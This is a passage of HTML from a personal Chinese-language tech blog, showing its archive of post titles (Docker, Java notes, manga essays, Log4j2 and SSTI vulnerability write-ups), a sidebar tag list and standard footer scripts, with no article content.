            <span class="archive-post-date">01/30</span>
            <a class="archive-post-title" href="/2023/01/30/Getting-start-of-Docker/">Docker入门</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/23</span>
            <a class="archive-post-title" href="/2023/01/23/Thinking-of-Sayonara-Eri/">《再见绘梨》随想</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/22</span>
            <a class="archive-post-title" href="/2023/01/22/Tatsuki-Fujimoto-s-reality-and-fiction/">藤本树的奇幻色彩与现实底色</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/15</span>
            <a class="archive-post-title" href="/2023/01/15/Android-Reverse-Learning-Note/">安卓逆向入门</a>
        </li>
    
        
            
            
                
                </ul>
            
            <div class="archive-year"> 2022 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/27</span>
            <a class="archive-post-title" href="/2022/12/27/From-RCE-to-getShell/">从RCE到getShell——Log4j2进阶利用</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/20</span>
            <a class="archive-post-title" href="/2022/12/20/log4j-RCE/">Log4j2 RCE漏洞复现</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/08</span>
            <a class="archive-post-title" href="/2022/12/08/from-0-to-1-EE-Learning-Note/">从零开始的电子学习之路</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/18</span>
            <a class="archive-post-title" href="/2022/11/18/Java-web-file-manger-cloud-online/">基于JavaWeb的文件管理系统+OrangePi+内网穿透实现不限速大容量网盘</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/09</span>
            <a class="archive-post-title" href="/2022/11/09/hello-world/">Hello World——My first Hexo Blog</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">09/28</span>
            <a class="archive-post-title" href="/2022/09/28/Java-Web-learning-Note/">Java Web学习笔记v3</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">09/08</span>
            <a class="archive-post-title" href="/2022/09/08/Java-learning-Note-v-3/">Java学习笔记</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">06/17</span>
            <a class="archive-post-title" href="/2022/06/17/Java-learning-Note-v-2/">Java学习笔记v2</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/14</span>
            <a class="archive-post-title" href="/2022/04/14/Note%20of%20Java%20Learning/">Java学习笔记v1</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/01</span>
            <a class="archive-post-title" href="/2022/03/01/javascript-report-in-bili/">简单的JS插件编写——检索Bilibili评论并举办</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">02/14</span>
            <a class="archive-post-title" href="/2022/02/14/ssti-quick-start/">SSTI——flask模板注入漏洞入门</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/30</span>
            <a class="archive-post-title" href="/2022/01/30/qqbot-y2b-pusher/">QQbot油管开播推送API编写逻辑</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/18</span>
            <a class="archive-post-title" href="/2022/01/18/nonebot2-pulgin-coding/">基于nonebot2框架的插件编写——开播信息推送</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/04</span>
            <a class="archive-post-title" href="/2022/01/04/Python-spder-starting/">Python爬虫入门</a>
        </li>
    
        
            
            
                
                </ul>
            
            <div class="archive-year"> 2021 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/21</span>
            <a class="archive-post-title" href="/2021/12/21/simple-shell-script/">简单的Shell脚本实战</a>
        </li>
    
    </div>
</div>

        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
        
            <span class="sidebar-tag-name" data-tags="Android">
                <span class="iconfont-archer">&#xe606;</span>
                Android
            </span>
        
            <span class="sidebar-tag-name" data-tags="java">
                <span class="iconfont-archer">&#xe606;</span>
                java
            </span>
        
            <span class="sidebar-tag-name" data-tags="RCE">
                <span class="iconfont-archer">&#xe606;</span>
                RCE
            </span>
        
            <span class="sidebar-tag-name" data-tags="Reverse shell">
                <span class="iconfont-archer">&#xe606;</span>
                Reverse shell
            </span>
        
            <span class="sidebar-tag-name" data-tags="web">
                <span class="iconfont-archer">&#xe606;</span>
                web
            </span>
        
            <span class="sidebar-tag-name" data-tags="JavaScript">
                <span class="iconfont-archer">&#xe606;</span>
                JavaScript
            </span>
        
            <span class="sidebar-tag-name" data-tags="python">
                <span class="iconfont-archer">&#xe606;</span>
                python
            </span>
        
            <span class="sidebar-tag-name" data-tags="Comic">
                <span class="iconfont-archer">&#xe606;</span>
                Comic
            </span>
        
            <span class="sidebar-tag-name" data-tags="java RCE">
                <span class="iconfont-archer">&#xe606;</span>
                java RCE
            </span>
        
            <span class="sidebar-tag-name" data-tags="嵌入式">
                <span class="iconfont-archer">&#xe606;</span>
                嵌入式
            </span>
        
            <span class="sidebar-tag-name" data-tags="硬件">
                <span class="iconfont-archer">&#xe606;</span>
                硬件
            </span>
        
            <span class="sidebar-tag-name" data-tags="Linux">
                <span class="iconfont-archer">&#xe606;</span>
                Linux
            </span>
        
            <span class="sidebar-tag-name" data-tags="SSTI">
                <span class="iconfont-archer">&#xe606;</span>
                SSTI
            </span>
        
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
        缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98
    </div> 
    <div class="sidebar-tags-list"></div>
</div>

        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>

    </div>
</div>

        <!-- site-meta -->
        <script>
    var siteMetaRoot = "/"
    if (siteMetaRoot === "undefined") {
        siteMetaRoot = '/'
    }
    var siteMeta = {
        url: "https://kizureina.github.io",
        root: siteMetaRoot,
        author: "Kizurena"
    }
</script>

        <!-- import experimental options here -->
        <!-- Custom Font -->


        <!-- main func -->
        <script src="/scripts/main.js?v=20211217"></script>
        <!-- dark mode -->
        <script src="/scripts/dark.js?v=20211217"></script>
        <!-- fancybox -->
        <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" defer></script>
        <!-- algolia -->
        
        <!-- busuanzi -->
        
            <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
        
        <!-- CNZZ -->
        
        <!-- async load share.js -->
        
            <script src="/scripts/share.js?v=20211217" async></script>
        
        <!-- mermaid -->
        
    </body>
</html>
